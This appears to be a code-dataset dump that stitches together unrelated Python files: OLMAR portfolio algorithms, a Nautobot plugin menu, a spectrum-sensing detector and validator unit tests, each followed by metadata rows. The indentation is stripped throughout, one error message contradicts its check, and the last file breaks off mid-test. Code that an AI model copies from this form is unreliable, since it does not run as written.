def update(self, b, x, eps):
""" Update portfolio weights to satisfy constraint b * x >= eps
and minimize distance to previous weights. """
x_mean = np.mean(x)
lam = max(0., (eps - np.dot(b, x)) / np.linalg.norm(x - x_mean)**2)
# limit lambda to avoid numerical problems
lam = min(100000, lam)
# update portfolio
b = b + lam * (x - x_mean)
# project it onto simplex
return tools.simplex_proj(b)
class OLMEDIAN(Algo):
PRICE_TYPE = 'raw'
REPLACE_MISSING = True
def __init__(self, window=5, eps=10):
"""
:param window: Lookback window.
:param eps: Constraint on return for new weights on last price (average of prices).
x * w >= eps for new weights w.
"""
super(OLMEDIAN, self).__init__(min_history=window)
# input check
if window < 2:
raise ValueError('window parameter must be >=3')
if eps < 1:
raise ValueError('epsilon parameter must be >=1')
self.window = window
self.eps = eps
def init_weights(self, m):
return np.ones(m) / m
def step(self, x, last_b, history):
# calculate return prediction
x_pred = self.predict(x, history.iloc[-self.window:])
b = self.update(last_b, x_pred, self.eps)
return b
def predict(self, x, history):
""" Predict returns on next day.
THIS IS OUR MAIN MODIFICATION
"""
return (history / x).median()
def update(self, b, x, eps):
""" Update portfolio weights to satisfy constraint b * x >= eps
and minimize distance to previous weights. """
x_mean = np.mean(x)
lam = max(0., (eps - np.dot(b, x)) / np.linalg.norm(x - x_mean)**2)
# limit lambda to avoid numerical problems
lam = min(100000, lam)
# update portfolio
b = b + lam * (x - x_mean)
# project it onto simplex
return tools.simplex_proj(b)
class OLMAX(Algo):
PRICE_TYPE = 'raw'
REPLACE_MISSING = True
def __init__(self, window=5, eps=10):
"""
:param window: Lookback window.
:param eps: Constraint on return for new weights on last price (average of prices).
x * w >= eps for new weights w.
"""
super(OLMAX, self).__init__(min_history=window)
# input check
if window < 2:
raise ValueError('window parameter must be >=3')
if eps < 1:
raise ValueError('epsilon parameter must be >=1')
self.window = window
self.eps = eps
def init_weights(self, m):
return np.ones(m) / m
def step(self, x, last_b, history):
# calculate return prediction
x_pred = self.predict(x, history.iloc[-self.window:])
b = self.update(last_b, x_pred, self.eps)
return b
def predict(self, x, history):
""" Predict returns on next day.
THIS IS OUR MAIN MODIFICATION
"""
return (history / x).max()
def update(self, b, x, eps):
""" Update portfolio weights to satisfy constraint b * x >= eps
and minimize distance to previous weights. """
x_mean = np.mean(x)
lam = max(0., (eps - np.dot(b, x)) / np.linalg.norm(x - x_mean)**2)
# limit lambda to avoid numerical problems
lam = min(100000, lam)
# update portfolio
b = b + lam * (x - x_mean)
# project it onto simplex
return tools.simplex_proj(b)
class OLMIN(Algo):
PRICE_TYPE = 'raw'
REPLACE_MISSING = True
def __init__(self, window=5, eps=10):
"""
:param window: Lookback window.
:param eps: Constraint on return for new weights on last price (average of prices).
x * w >= eps for new weights w.
"""
super(OLMIN, self).__init__(min_history=window)
# input check
if window < 2:
raise ValueError('window parameter must be >=3')
if eps < 1:
raise ValueError('epsilon parameter must be >=1')
self.window = window
self.eps = eps
def init_weights(self, m):
return np.ones(m) / m
def step(self, x, last_b, history):
# calculate return prediction
x_pred = self.predict(x, history.iloc[-self.window:])
b = self.update(last_b, x_pred, self.eps)
return b
def predict(self, x, history):
""" Predict returns on next day.
THIS IS OUR MAIN MODIFICATION
"""
return (history / x).min()
def update(self, b, x, eps):
""" Update portfolio weights to satisfy constraint b * x >= eps
and minimize distance to previous weights. """
x_mean = np.mean(x)
lam = max(0., (eps - np.dot(b, x)) / np.linalg.norm(x - x_mean)**2)
# limit lambda to avoid numerical problems
lam = min(100000, lam)
# update portfolio
b = b + lam * (x - x_mean)
# project it onto simplex
return tools.simplex_proj(b)
class OLMAR_max_k(Algo):
""" On-Line Portfolio Selection with Moving Average Reversion
Reference:
B. Li and S. C. H. Hoi.
On-line portfolio selection with moving average reversion, 2012.
http://icml.cc/2012/papers/168.pdf
"""
PRICE_TYPE = 'raw'
REPLACE_MISSING = True
def __init__(self, window=5, eps=10, k = 1):
"""
:param window: Lookback window.
:param eps: Constraint on return for new weights on last price (average of prices).
x * w >= eps for new weights w.
"""
super(OLMAR_max_k, self).__init__(min_history=window)
# input check
if window < 2:
raise ValueError('window parameter must be >=3')
if eps < 1:
raise ValueError('epsilon parameter must be >=1')
self.window = window
self.eps = eps
self.k = k
def init_weights(self, m):
return np.ones(m) / m
def step(self, x, last_b, history):
# calculate return prediction
x_pred = self.predict(x, history.iloc[-self.window:])
b = self.update(last_b, x_pred, self.eps)
return b
def predict(self, x, history):
""" Predict returns on next day. """
return (history / x).mean()
def update(self, b, x, eps):
""" Update portfolio weights to satisfy constraint b * x >= eps
and minimize distance to previous weights. """
x = np.asarray(x)
sorted_idx = np.argsort(x)[::-1]
allocation = np.zeros(len(x))
allocation[sorted_idx[:self.k]] = 1.0
return (allocation + 0.0)/ np.sum(allocation)
| 28.617577
| 102
| 0.567065
| 1,593
| 12,048
| 4.190207
| 0.100439
| 0.00809
| 0.027266
| 0.019925
| 0.87985
| 0.87236
| 0.87236
| 0.87236
| 0.852434
| 0.852434
| 0
| 0.018914
| 0.324203
| 12,048
| 420
| 103
| 28.685714
| 0.800909
| 0.304283
| 0
| 0.795699
| 0
| 0
| 0.054631
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.188172
| false
| 0
| 0.016129
| 0.037634
| 0.467742
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
21a43b152a39b55399cd0af03e1d78a9c938830a
| 17,145
|
py
|
Python
|
nautobot_device_lifecycle_mgmt/navigation.py
|
networktocode-llc/nautobot-plugin-device-lifecycle-mgmt
|
b960a61f8169bcc6667b4e648db4616686e188a0
|
[
"Apache-2.0"
] | null | null | null |
nautobot_device_lifecycle_mgmt/navigation.py
|
networktocode-llc/nautobot-plugin-device-lifecycle-mgmt
|
b960a61f8169bcc6667b4e648db4616686e188a0
|
[
"Apache-2.0"
] | null | null | null |
nautobot_device_lifecycle_mgmt/navigation.py
|
networktocode-llc/nautobot-plugin-device-lifecycle-mgmt
|
b960a61f8169bcc6667b4e648db4616686e188a0
|
[
"Apache-2.0"
] | null | null | null |
"""Menu items for the Lifecycle Management plugin."""
# pylint: disable=C0412
from nautobot.utilities.choices import ButtonColorChoices
try:
from nautobot.core.apps import NavMenuTab, NavMenuGroup, NavMenuItem, NavMenuButton
menu_items = (
NavMenuTab(
name="Device Lifecycle",
weight=600,
groups=(
NavMenuGroup(
name="Hardware Notices",
weight=100,
items=(
NavMenuItem(
link="plugins:nautobot_device_lifecycle_mgmt:hardwarelcm_list",
name="Hardware Notices",
buttons=(
NavMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:hardwarelcm_add",
title="Add",
icon_class="mdi mdi-plus-thick",
button_class=ButtonColorChoices.GREEN,
permissions=[
"nautobot_device_lifecycle_mgmt.add_hardwarelcm",
],
),
NavMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:hardwarelcm_import",
title="Import",
icon_class="mdi mdi-database-import-outline",
button_class=ButtonColorChoices.BLUE,
permissions=[
"nautobot_device_lifecycle_mgmt.add_hardwarelcm",
],
),
),
permissions=[
"nautobot_device_lifecycle_mgmt.view_hardwarelcm",
],
),
),
),
NavMenuGroup(
name="Software Lifecycle",
weight=100,
items=(
NavMenuItem(
link="plugins:nautobot_device_lifecycle_mgmt:softwarelcm_list",
name="Software",
buttons=(
NavMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:softwarelcm_add",
title="Add",
icon_class="mdi mdi-plus-thick",
button_class=ButtonColorChoices.GREEN,
permissions=[
"nautobot_device_lifecycle_mgmt.add_softwarelcm",
],
),
NavMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:softwarelcm_import",
title="Import",
icon_class="mdi mdi-database-import-outline",
button_class=ButtonColorChoices.BLUE,
permissions=["nautobot_device_lifecycle_mgmt.add_softwarelcm"],
),
),
permissions=[
"nautobot_device_lifecycle_mgmt.view_softwarelcm",
],
),
NavMenuItem(
link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftwarelcm_list",
name="Validated Software",
buttons=(
NavMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftwarelcm_add",
title="Add",
icon_class="mdi mdi-plus-thick",
button_class=ButtonColorChoices.GREEN,
permissions=[
"nautobot_device_lifecycle_mgmt.add_validatedsoftwarelcm",
],
),
NavMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftwarelcm_import",
title="Import",
icon_class="mdi mdi-database-import-outline",
button_class=ButtonColorChoices.BLUE,
permissions=["nautobot_device_lifecycle_mgmt.add_validatedsoftwarelcm"],
),
),
permissions=[
"nautobot_device_lifecycle_mgmt.view_validatedsoftwarelcm",
],
),
),
),
NavMenuGroup(
name="Contracts",
weight=100,
items=(
NavMenuItem(
link="plugins:nautobot_device_lifecycle_mgmt:contractlcm_list",
name="Contracts",
buttons=(
NavMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:contractlcm_add",
title="Add",
icon_class="mdi mdi-plus-thick",
button_class=ButtonColorChoices.GREEN,
permissions=[
"nautobot_device_lifecycle_mgmt.add_contractlcm",
],
),
NavMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:contractlcm_import",
title="Import",
icon_class="mdi mdi-database-import-outline",
button_class=ButtonColorChoices.BLUE,
permissions=[
"nautobot_device_lifecycle_mgmt.add_contractlcm",
],
),
),
permissions=[
"nautobot_device_lifecycle_mgmt.view_contractlcm",
],
),
NavMenuItem(
link="plugins:nautobot_device_lifecycle_mgmt:providerlcm_list",
name="Vendors",
buttons=(
NavMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:providerlcm_add",
title="Add",
icon_class="mdi mdi-plus-thick",
button_class=ButtonColorChoices.GREEN,
permissions=[
"nautobot_device_lifecycle_mgmt.add_providerlcm",
],
),
NavMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:providerlcm_import",
title="Import",
icon_class="mdi mdi-database-import-outline",
button_class=ButtonColorChoices.BLUE,
permissions=[
"nautobot_device_lifecycle_mgmt.add_providerlcm",
],
),
),
permissions=[
"nautobot_device_lifecycle_mgmt.view_providerlcm",
],
),
NavMenuItem(
link="plugins:nautobot_device_lifecycle_mgmt:contactlcm_list",
name="POC",
buttons=(
NavMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:contactlcm_add",
title="Add",
icon_class="mdi mdi-plus-thick",
button_class=ButtonColorChoices.GREEN,
permissions=[
"nautobot_device_lifecycle_mgmt.add_contactlcm",
],
),
NavMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:contactlcm_import",
title="Import",
icon_class="mdi mdi-database-import-outline",
button_class=ButtonColorChoices.BLUE,
permissions=[
"nautobot_device_lifecycle_mgmt.add_contactlcm",
],
),
),
permissions=[
"nautobot_device_lifecycle_mgmt.view_contactlcm",
],
),
),
),
NavMenuGroup(
name="Reports",
weight=100,
items=(
NavMenuItem(
link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftware_device_report",
name="Device Software Validation",
permissions=[
"nautobot_device_lifecycle_mgmt.view_validatedsoftwarelcm",
],
),
NavMenuItem(
link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftware_inventoryitem_report",
name="Inventory Item Software Validation",
permissions=[
"nautobot_device_lifecycle_mgmt.view_validatedsoftwarelcm",
],
),
),
),
),
),
)
except ModuleNotFoundError:
from nautobot.extras.plugins import PluginMenuItem, PluginMenuButton
menu_items = (
PluginMenuItem(
link="plugins:nautobot_device_lifecycle_mgmt:hardwarelcm_list",
link_text="Hardware Notices",
buttons=(
PluginMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:hardwarelcm_add",
title="Add",
icon_class="mdi mdi-plus-thick",
color=ButtonColorChoices.GREEN,
permissions=["nautobot_device_lifecycle_mgmt.add_hardwarelcm"],
),
PluginMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:hardwarelcm_import",
title="Import",
icon_class="mdi mdi-database-import-outline",
color=ButtonColorChoices.BLUE,
permissions=["nautobot_device_lifecycle_mgmt.add_hardwarelcm"],
),
),
),
PluginMenuItem(
link="plugins:nautobot_device_lifecycle_mgmt:contractlcm_list",
link_text="Contracts",
buttons=(
PluginMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:contractlcm_add",
title="Add",
icon_class="mdi mdi-plus-thick",
color=ButtonColorChoices.GREEN,
permissions=["nautobot_device_lifecycle_mgmt.add_contractlcm"],
),
PluginMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:contractlcm_import",
title="Import",
icon_class="mdi mdi-database-import-outline",
color=ButtonColorChoices.BLUE,
permissions=["nautobot_device_lifecycle_mgmt.add_contractlcm"],
),
),
),
PluginMenuItem(
link="plugins:nautobot_device_lifecycle_mgmt:providerlcm_list",
link_text="Vendors",
buttons=(
PluginMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:providerlcm_add",
title="Add",
icon_class="mdi mdi-plus-thick",
color=ButtonColorChoices.GREEN,
permissions=["nautobot_device_lifecycle_mgmt.add_providerlcm"],
),
PluginMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:providerlcm_import",
title="Import",
icon_class="mdi mdi-database-import-outline",
color=ButtonColorChoices.BLUE,
permissions=["nautobot_device_lifecycle_mgmt.add_providerlcm"],
),
),
),
PluginMenuItem(
link="plugins:nautobot_device_lifecycle_mgmt:contactlcm_list",
link_text="POC",
buttons=(
PluginMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:contactlcm_add",
title="Add",
icon_class="mdi mdi-plus-thick",
color=ButtonColorChoices.GREEN,
permissions=["nautobot_device_lifecycle_mgmt.add_contactlcm"],
),
PluginMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:contactlcm_import",
title="Import",
icon_class="mdi mdi-database-import-outline",
color=ButtonColorChoices.BLUE,
permissions=["nautobot_device_lifecycle_mgmt.add_contactlcm"],
),
),
),
PluginMenuItem(
link="plugins:nautobot_device_lifecycle_mgmt:softwarelcm_list",
link_text="Software",
buttons=(
PluginMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:softwarelcm_add",
title="Add",
icon_class="mdi mdi-plus-thick",
color=ButtonColorChoices.GREEN,
permissions=["nautobot_device_lifecycle_mgmt.add_softwarelcm"],
),
PluginMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:softwarelcm_import",
title="Import",
icon_class="mdi mdi-database-import-outline",
color=ButtonColorChoices.BLUE,
permissions=["nautobot_device_lifecycle_mgmt.add_softwarelcm"],
),
),
),
PluginMenuItem(
link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftwarelcm_list",
link_text="Validated Software",
buttons=(
PluginMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftwarelcm_add",
title="Add",
icon_class="mdi mdi-plus-thick",
color=ButtonColorChoices.GREEN,
permissions=["nautobot_device_lifecycle_mgmt.add_validatedsoftwarelcm"],
),
PluginMenuButton(
link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftwarelcm_import",
title="Import",
icon_class="mdi mdi-database-import-outline",
color=ButtonColorChoices.BLUE,
permissions=["nautobot_device_lifecycle_mgmt.add_validatedsoftwarelcm"],
),
),
),
PluginMenuItem(
link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftware_device_report",
link_text="Report: Device OS Validation",
),
PluginMenuItem(
link="plugins:nautobot_device_lifecycle_mgmt:validatedsoftware_inventoryitem_report",
link_text="Report: Inventory Item OS Validation",
),
)
| 49.695652
| 113
| 0.434821
| 1,016
| 17,145
| 7.004921
| 0.074803
| 0.153857
| 0.232682
| 0.273149
| 0.893916
| 0.893916
| 0.864409
| 0.839258
| 0.709569
| 0.594633
| 0
| 0.002212
| 0.499096
| 17,145
| 344
| 114
| 49.840116
| 0.826502
| 0.004083
| 0
| 0.899705
| 0
| 0
| 0.285898
| 0.245826
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.115044
| 0
| 0.115044
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
21ef30338c741ccac4af3258c95898a36c5c2acc
| 2,767
|
py
|
Python
|
cyclostationary_detector/cyclostationary_detector_a.py
|
vineeths96/Spectrum-Sensing-for-Cognitive-Radio
|
a280ef512f7a6ed69d284eb7fda26e58c513eb9f
|
[
"MIT"
] | 6
|
2021-05-24T11:02:38.000Z
|
2022-03-04T02:53:49.000Z
|
cyclostationary_detector/cyclostationary_detector_a.py
|
vineeths96/Spectrum-sensing-for-cognitive-radio
|
a280ef512f7a6ed69d284eb7fda26e58c513eb9f
|
[
"MIT"
] | null | null | null |
cyclostationary_detector/cyclostationary_detector_a.py
|
vineeths96/Spectrum-sensing-for-cognitive-radio
|
a280ef512f7a6ed69d284eb7fda26e58c513eb9f
|
[
"MIT"
] | 3
|
2020-11-17T08:43:45.000Z
|
2021-04-05T13:47:07.000Z
|
import numpy as np
import matplotlib.pyplot as plt
from cyclostationary_detector.parameters import *
def generate_statistic_H0(NUM_STATISTICS, sigma_w, N):
"""
Generate H0 test statistics
:param NUM_STATISTICS: Number of statistics to be produced
:param sigma_w: Std deviation of noise
:param N: Length of observation vector
:return: H0 test statistics
"""
T_y = np.zeros(NUM_STATISTICS, dtype=np.complex)
for ind in range(NUM_STATISTICS):
w = sigma_w * np.random.randn(N, 2).view(np.complex128)
y = w
# Calculate test statistic
val = np.complex(0)
for n in range(N_c):
for k in range(K):
val += y[n + k * (N_c + N_d)] * np.conjugate(y[n + k * (N_c + N_d) + N_d])
T_y[ind] = 1 / K * val
return T_y
def generate_statistic_H1(NUM_STATISTICS, sigma_w, N):
"""
Generate H1 test statistics
:param NUM_STATISTICS: Number of statistics to be produced
:param sigma_w: Std deviation of noise
:param N: Length of observation vector
:return: H1 test statistics
"""
T_y = np.zeros(NUM_STATISTICS, dtype=np.complex)
for ind in range(NUM_STATISTICS):
x = sigma_s * np.random.randn(N, 1)
for k in range(K):
x[k * (N_c + N_d): k * (N_c + N_d) + N_c] = x[k * (N_c + N_d) + N_d: (k + 1) * (N_c + N_d)]
w = sigma_w * np.random.randn(N, 2).view(np.complex128)
y = x + w
# Calculate test statistic
val = np.complex(0)
for n in range(N_c):
for k in range(K):
val += y[n + k * (N_c + N_d)] * np.conjugate(y[n + k * (N_c + N_d) + N_d])
T_y[ind] = 1 / K * val
return T_y
def main():
N = (K + 1) * (N_c + N_d)
sigma_w = np.sqrt(sigma_s ** 2 / 10 ** (SNR / 10))
T_y_0 = generate_statistic_H0(NUM_STATISTICS, sigma_w, N)
T_y_1 = generate_statistic_H1(NUM_STATISTICS, sigma_w, N)
# Plot and save the results
plt.figure()
plt.subplot(211)
plt.hist(np.real(T_y_0), bins=125)
plt.title("$H_{0}$ Statistic distribution - Real component")
plt.subplot(212)
plt.hist(np.imag(T_y_0), bins=125)
plt.title("$H_{0}$ Statistic distribution - Imaginary component")
plt.tight_layout()
plt.savefig('./results/cyclostationary_detector_a_H0.png')
plt.show()
plt.figure()
plt.subplot(211)
plt.hist(np.real(T_y_1), bins=125)
plt.title("$H_{1}$ Statistic distribution - Real component")
plt.subplot(212)
plt.hist(np.imag(T_y_1), bins=125)
plt.title("$H_{1}$ Statistic distribution - Imaginary component")
plt.tight_layout()
plt.savefig('./results/cyclostationary_detector_a_H1.png')
plt.show()
if __name__ == '__main__':
main()
| 28.525773
| 103
| 0.612215
| 441
| 2,767
| 3.632653
| 0.204082
| 0.014981
| 0.016854
| 0.022472
| 0.865169
| 0.857678
| 0.832085
| 0.827715
| 0.730337
| 0.730337
| 0
| 0.031174
| 0.258041
| 2,767
| 96
| 104
| 28.822917
| 0.749148
| 0.166968
| 0
| 0.527273
| 1
| 0
| 0.130357
| 0.038393
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054545
| false
| 0
| 0.054545
| 0
| 0.145455
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0dfc3bc0ce8f4ae17248c3c6ebc92fb2f4f41a12
| 34,197
|
py
|
Python
|
tests/dirty_validators/tests_basic.py
|
alfred82santa/dirty-validators
|
2dd0cdb0da5bc166478667639f0f15c2902b5823
|
[
"MIT"
] | 1
|
2017-04-29T17:22:16.000Z
|
2017-04-29T17:22:16.000Z
|
tests/dirty_validators/tests_basic.py
|
alfred82santa/dirty-validators
|
2dd0cdb0da5bc166478667639f0f15c2902b5823
|
[
"MIT"
] | 8
|
2017-03-27T12:37:49.000Z
|
2020-03-31T11:04:49.000Z
|
tests/dirty_validators/tests_basic.py
|
alfred82santa/dirty-validators
|
2dd0cdb0da5bc166478667639f0f15c2902b5823
|
[
"MIT"
] | null | null | null |
import re
from unittest import TestCase
from dirty_validators.basic import (URI, URL, UUID, AnyOf, BaseValidator,
Email, EqualTo, IPAddress, IsEmpty, IsNone,
Length, MacAddress, NoneOf, NotEmpty,
NotEmptyString, NotEqualTo, NotNone,
NumberRange, Regexp, StringNotContaining)
class TestBaseValidator(TestCase):
def setUp(self):
self.validator = BaseValidator()
def tearDown(self):
pass
def test_validate_none(self):
result = self.validator.is_valid(None)
self.assertTrue(result)
self.assertEqual(result.error_messages, [])
def test_validate_int(self):
result = self.validator.is_valid(3)
self.assertTrue(result)
self.assertEqual(result.error_messages, [])
def test_validate_str(self):
result = self.validator.is_valid('aaa')
self.assertTrue(result)
self.assertEqual(result.error_messages, [])
def test_validate_dict(self):
result = self.validator.is_valid({})
self.assertTrue(result)
self.assertEqual(result.error_messages, [])
def test_error_not_hidden_behaviour(self):
error_key = 'Test key'
error_message = "'$value' is the value error to test hidden feature"
self.validator.error_messages = {error_key: error_message}
ctx = self.validator._build_context('Not hidden')
self.validator.error(error_code=error_key, ctx=ctx)
self.assertFalse(ctx)
self.assertEqual(len(ctx.error_messages), 1)
self.assertEqual(ctx.error_messages[0].code, error_key)
self.assertEqual(ctx.error_messages[0].msg,
"'Not hidden' is the value error to test hidden feature")
def test_error_hidden_behaviour(self):
hidden_validator = BaseValidator(hide_value=True)
error_key = 'Test key'
error_message = "'$value' is the value error to test hidden feature"
hidden_validator.error_messages = {error_key: error_message}
ctx = hidden_validator._build_context('Not hidden')
hidden_validator.error(error_code=error_key, ctx=ctx)
self.assertFalse(ctx)
self.assertEqual(len(ctx.error_messages), 1)
self.assertEqual(ctx.error_messages[0].code, error_key)
self.assertEqual(ctx.error_messages[0].msg,
"'**hidden**' is the value error to test hidden feature")
class TestEqualTo(TestCase):
def test_validate_str_success(self):
validator = EqualTo(comp_value="aaa")
result = validator.is_valid("aaa")
self.assertTrue(result)
self.assertEqual(result.error_messages, [])
def test_validate_str_fail(self):
validator = EqualTo(comp_value="aaa")
result = validator.is_valid("aqaa")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, EqualTo.NOT_EQUAL)
self.assertEqual(result.error_messages[0].msg,
"'aqaa' is not equal to 'aaa'")
def test_validate_int_success(self):
validator = EqualTo(comp_value=3)
result = validator.is_valid(3)
self.assertTrue(result)
self.assertEqual(result.error_messages, [])
def test_validate_int_fail(self):
validator = EqualTo(comp_value=3)
result = validator.is_valid(1)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, EqualTo.NOT_EQUAL)
self.assertEqual(result.error_messages[0].msg,
"'1' is not equal to '3'")
def test_validate_int_fail_custom_error_message(self):
validator = EqualTo(comp_value=3, error_messages={EqualTo.NOT_EQUAL: "$value $value aaa $comp_value"})
result = validator.is_valid(4)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, EqualTo.NOT_EQUAL)
self.assertEqual(result.error_messages[0].msg,
"4 4 aaa 3")
def test_validate_int_fail_custom_error_code(self):
validator = EqualTo(comp_value=3, error_code_map={EqualTo.NOT_EQUAL: "newError"})
result = validator.is_valid(4)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, 'newError')
self.assertEqual(result.error_messages[0].msg,
"'4' is not equal to '3'")
def test_validate_int_fail_custom_error_code_and_error_message(self):
validator = EqualTo(comp_value=3,
error_code_map={EqualTo.NOT_EQUAL: "newError"},
error_messages={EqualTo.NOT_EQUAL: "$value $value aaa $comp_value"})
result = validator.is_valid(4)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, 'newError')
self.assertEqual(result.error_messages[0].msg,
"4 4 aaa 3")
def test_validate_int_fail_custom_error_code_error_message_and_custom_value(self):
validator = EqualTo(comp_value=3,
error_code_map={EqualTo.NOT_EQUAL: "newError"},
error_messages={EqualTo.NOT_EQUAL: "$value $value aaa $comp_value $value1 $value2"},
message_values={"value1": "aaaaaa1", "value2": "eeeeee1"})
result = validator.is_valid(4)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, 'newError')
self.assertEqual(result.error_messages[0].msg,
'4 4 aaa 3 aaaaaa1 eeeeee1')
class TestNotEqualTo(TestCase):
def test_validate_str_success(self):
validator = NotEqualTo(comp_value="aaa")
result = validator.is_valid('aqaa')
self.assertTrue(result)
self.assertEqual(result.error_messages, [])
def test_validate_str_fail(self):
validator = NotEqualTo(comp_value="aaa")
result = validator.is_valid('aaa')
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, NotEqualTo.IS_EQUAL)
self.assertEqual(result.error_messages[0].msg, "'aaa' is equal to 'aaa'")
def test_validate_int_success(self):
validator = NotEqualTo(comp_value=3)
result = validator.is_valid(4)
self.assertTrue(result)
self.assertEqual(result.error_messages, [])
def test_validate_int_fail(self):
validator = NotEqualTo(comp_value=3)
result = validator.is_valid(3)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, NotEqualTo.IS_EQUAL)
self.assertEqual(result.error_messages[0].msg, "'3' is equal to '3'")
class TestStringNotContaining(TestCase):
def setUp(self):
self.validator = StringNotContaining(token='Test_TOKEN')
def test_validate_string_contains(self):
result = self.validator.is_valid('This string contains Test_TOKEN for sure')
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, StringNotContaining.NOT_CONTAINS)
self.assertEqual(result.error_messages[0].msg,
"'This string contains Test_TOKEN for sure' contains 'Test_TOKEN'")
def test_validate_string_not_contains(self):
self.assertTrue(self.validator.is_valid('This string does not contain TESt_TOKEN for sensitive cases'))
def test_validate_string_contains_not_sensitive(self):
self.validator.case_sensitive = False
self.assertFalse(self.validator.is_valid('This string contains TESt_TOKEN for sensitive cases'))
class TestLength(TestCase):
def setUp(self):
self.validator = Length(min=3, max=6)
def tearDown(self):
pass
def test_validate_str_success(self):
self.assertTrue(self.validator.is_valid("aqaa"))
def test_validate_str_fail_short(self):
result = self.validator.is_valid("aa")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, Length.TOO_SHORT)
self.assertEqual(result.error_messages[0].msg,
"'aa' is less than 3 unit length")
def test_validate_str_fail_long(self):
result = self.validator.is_valid("aabbnnmm")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, Length.TOO_LONG)
self.assertEqual(result.error_messages[0].msg,
"'aabbnnmm' is more than 6 unit length")
def test_validate_int_fail(self):
result = self.validator.is_valid(5)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, Length.INVALID_TYPE)
self.assertEqual(result.error_messages[0].msg,
"'5' has no length")
def test_validate_list_success(self):
self.assertTrue(self.validator.is_valid(["1a", "32d", "tr", "wq"]))
def test_validate_list_fail_short(self):
result = self.validator.is_valid(["1a"])
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, Length.TOO_SHORT)
self.assertEqual(result.error_messages[0].msg,
"'['1a']' is less than 3 unit length")
def test_validate_list_fail_long(self):
result = self.validator.is_valid(["1a", "32d", "tr", "wq", "qwqw", "dd", "as", "er"])
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, Length.TOO_LONG)
self.assertEqual(result.error_messages[0].msg,
"'['1a', '32d', 'tr', 'wq', 'qwqw', 'dd', 'as', 'er']' is more than 6 unit length")
class TestNumberRange(TestCase):
def setUp(self):
self.validator = NumberRange(min=3, max=4)
def tearDown(self):
pass
def test_validate_int_success(self):
self.assertTrue(self.validator.is_valid(4))
def test_validate_int_fail(self):
result = self.validator.is_valid(5)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, NumberRange.OUT_OF_RANGE)
self.assertEqual(result.error_messages[0].msg,
"'5' is out of range (3, 4)")
def test_validate_int_no_min_success(self):
validator = NumberRange(max=4)
self.assertTrue(validator.is_valid(1))
def test_validate_int_no_min_fail(self):
validator = NumberRange(max=4)
result = validator.is_valid(5)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
